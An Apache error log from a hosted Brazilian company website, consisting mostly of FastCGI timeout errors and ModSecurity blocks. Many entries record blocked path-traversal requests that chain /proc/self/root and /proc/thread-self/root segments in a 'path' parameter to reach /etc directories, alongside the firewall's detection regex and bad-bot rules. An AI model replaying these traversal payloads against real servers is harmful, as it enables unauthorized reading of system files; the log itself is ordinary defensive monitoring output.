[Wed Mar 18 01:58:15.034993 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:59442] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abow58df6f5d65gmYZSD4QAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 01:58:28.129849 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:40974] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:58:50.101836 2026] [proxy_fcgi:error] [pid 11816:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:41242] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:59:13.029827 2026] [proxy_fcgi:error] [pid 31803:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:41528] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:59:35.121784 2026] [proxy_fcgi:error] [pid 15826:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:41802] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:59:58.133812 2026] [proxy_fcgi:error] [pid 29882:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:42040] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:00:19.113943 2026] [proxy_fcgi:error] [pid 31803:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:42330] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:00:29.498317 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:58034] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboxbeyqAr6etmhZHNpr6QAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:00:41.128480 2026] [proxy_fcgi:error] [pid 30077:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:42594] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:00:54.727508 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.244.43:48846] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboxhkzinOy1jxa1j4fFnwAAAQQ"]
[Wed Mar 18 02:01:03.104580 2026] [proxy_fcgi:error] [pid 29882:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:42842] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:01:08.676179 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.243.128:58034] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboxlOyqAr6etmhZHNpr9gAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:01:25.117957 2026] [proxy_fcgi:error] [pid 30077:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:43120] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:01:26.785915 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.228.61:42370] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboxpvu8EFLIOrSqIpu8agAAAlY"]
[Wed Mar 18 02:01:47.125783 2026] [proxy_fcgi:error] [pid 17887:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:43492] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:01:52.878764 2026] [:error] [pid 29882:tid 140411548894976] [client 74.7.241.31:37864] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboxwEzinOy1jxa1j4fFvwAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:02:08.501815 2026] [proxy_fcgi:error] [pid 11816:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:43848] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:02:30.121809 2026] [proxy_fcgi:error] [pid 31803:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:44100] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:02:52.045853 2026] [proxy_fcgi:error] [pid 17887:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:44356] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:02:56.041814 2026] [mime_magic:error] [pid 17887:tid 140411708356352] (70014)End of file found: [client 74.7.241.31:38690] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/usr/local
[Wed Mar 18 02:02:56.042115 2026] [access_compat:error] [pid 17887:tid 140411708356352] [client 74.7.241.31:38690] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/usr/local
[Wed Mar 18 02:03:02.812322 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.243.128:53204] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboyBuoXxyEfFpUF8f8h_gAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:03:07.051624 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.241.31:35558] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboyC8df6f5d65gmYZSETgAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:03:14.121557 2026] [proxy_fcgi:error] [pid 29882:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:44552] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:03:19.173174 2026] [core:alert] [pid 15051:tid 140411666392832] [client 74.7.243.128:54046] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/sys/devices
[Wed Mar 18 02:03:26.185446 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.241.31:52644] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboyHuw_le52K8_3pV2UQwAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:03:33.310677 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.241.31:56348] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboyJSmAPhZkrhU8w4kjRQAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:03:36.121811 2026] [proxy_fcgi:error] [pid 15826:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:44780] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:03:58.045880 2026] [proxy_fcgi:error] [pid 15051:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:44964] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:04:11.566511 2026] [:error] [pid 15051:tid 140411616036608] [client 74.7.241.31:56364] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboySymAPhZkrhU8w4kjXAAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:04:21.121809 2026] [proxy_fcgi:error] [pid 15826:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:45182] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:04:43.121820 2026] [proxy_fcgi:error] [pid 15826:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:45362] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:04:50.244804 2026] [core:alert] [pid 17653:tid 140411616036608] [client 74.7.243.128:45778] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/var/lib/yum
[Wed Mar 18 02:05:08.125784 2026] [proxy_fcgi:error] [pid 17653:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:45530] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:05:12.721433 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.241.31:44542] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboyiOoXxyEfFpUF8f8iKgAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:05:31.119579 2026] [proxy_fcgi:error] [pid 30077:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:45764] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:05:53.069834 2026] [proxy_fcgi:error] [pid 15051:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:46018] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:05:54.692558 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.244.43:49184] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboysta6ubjKNq_cu4ZK6QAAA08"]
[Wed Mar 18 02:06:15.129810 2026] [proxy_fcgi:error] [pid 17887:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:46220] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:06:16.210486 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.241.31:41832] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboyyNa6ubjKNq_cu4ZK9gAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:06:23.026145 2026] [:error] [pid 29882:tid 140411699963648] [client 74.7.243.128:56912] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboyz0zinOy1jxa1j4fGCgAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:06:27.797068 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.228.61:50220] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboy08df6f5d65gmYZSElQAAAsY"]
[Wed Mar 18 02:06:39.125955 2026] [proxy_fcgi:error] [pid 19507:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:46444] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:07:01.129940 2026] [proxy_fcgi:error] [pid 19507:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:46674] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:07:14.588060 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.241.31:59056] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abozAvu8EFLIOrSqIpu8vAAAAk4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:07:23.125814 2026] [proxy_fcgi:error] [pid 15826:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:46938] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:07:30.761812 2026] [core:alert] [pid 15051:tid 140411666392832] [client 74.7.243.128:51308] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/lib/debug
[Wed Mar 18 02:07:45.046724 2026] [proxy_fcgi:error] [pid 15826:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:47202] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:07:56.835521 2026] [:error] [pid 29882:tid 140411699963648] [client 74.7.241.31:43192] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abozLEzinOy1jxa1j4fGKgAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:08:07.131996 2026] [proxy_fcgi:error] [pid 29882:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:47438] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:08:27.561335 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:45194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abozS-yqAr6etmhZHNpsdgAAAE8"], referer: 